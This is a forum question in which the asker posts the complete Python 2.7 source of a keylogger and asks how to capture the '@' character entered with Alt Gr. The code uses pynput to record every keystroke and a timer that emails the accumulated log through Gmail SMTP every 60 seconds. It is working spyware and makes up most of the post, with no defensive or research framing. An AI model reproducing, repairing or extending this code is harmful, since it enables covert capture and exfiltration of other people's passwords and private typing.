# keylogger in python 2.7 problem "alt gr" key to make the snail character "@"

Tags: python

I'm making a keylogger with a report that arrives at a specific email address with everything that is typed in the keyboard, in the keyboard of my notebook to make the character "@" scroll press the "alt gr" + the "ò" ", to realize the keylogger I use the pynput module, the problem is that it gives me error when I type the "alt gr" button so for the moment I intercepted the error by creating an exception that just typing the "alt gr" button string "ALT GR" but obviously so I do not solve the problem, how can I do to print the "@" snail character? below the sources of my keylogger

keylogger.py:

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pynput.keyboard
import threading
import smtplib

class Keylogger:
def __init__(self, time_interval, email, password):
    self.log = "Keylogger started"
    self.interval = time_interval
    self.email = email
    self.password = password

def append_to_log(self, string):
    self.log = self.log + string

def process_key_press(self, key):

    try:
        # current_key = str(key.char)
        current_key = str(key.char.encode('utf8'))

    except AttributeError:
        try:

            if key == key.space:
                current_key = " "
            else:
                current_key = " " + str(key) + " "

        except AttributeError:
            current_key = "ALT GR"

    self.append_to_log(current_key)

def report(self):
    self.send_mail(self.email, self.password, "\n\n" + self.log)
    self.log = ""
    timer = threading.Timer(self.interval, self.report)
    timer.start()

def send_mail(self, email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()

def start(self):
    keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
    with keyboard_listener:
        self.report()
        keyboard_listener.join()
```

run_key_logger.py:

```
#!/usr/bin/env python

import keylogger

my_keylogger = keylogger.Keylogger(60, "email",  "password")  
my_keylogger.start()
```